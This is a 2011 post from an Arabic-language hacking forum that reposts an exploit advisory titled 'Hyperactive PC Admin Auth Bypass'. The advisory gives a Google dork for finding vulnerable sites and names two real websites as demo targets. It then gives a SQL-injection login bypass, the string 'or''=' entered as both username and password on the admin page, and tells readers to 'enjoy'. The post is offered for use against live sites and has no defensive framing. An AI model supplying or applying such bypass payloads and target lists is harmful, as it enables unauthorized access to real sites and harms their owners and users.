:: vBspiders Professional Network :: - عرض مشاركة واحدة

b10001 · 08-11-2011, 08:04 PM

اليوم ساقدم ثغرة مسمينها ~ الموت العاجل
لا مزحة
افكر بعمل دورة اخيرة في المنتدى

كود PHP:

  [PHP]# Exploit Title:Hyperactive PC Admin Auth Bypass

# Date: 17/6/2011

# Author: Angel Injection & Noor Al-Iraqia

# home Page: http://www.club-h.co.cc

# Email: Angel-Injection[at]hotmail.com

# Vendor or Software Link:n/a

# Version: n/a

# Category:: webapps

# Google dork:"Website by Hyperactive PC, L.L.C." 

# Tested on: Linux Back Track 5

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# Demo site:

# 1-www.minnechauggolf.com/admin_login.asp

# 2-thecourseatyale.org/admin_login.asp

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

There are lots of sites

 
How exploitation

 
Exploit

http://server/[path]/admin.asp

 
User name : 'or''='

Password :  'or''='

 
And enjoy[IMG]http://www.9or.cc/data/media/89/313.gif[/IMG]

[/PHP]

المصدر: :: vBspiders Professional Network ::

lfj]z hsvu fhg]o,g tvwj; ZZ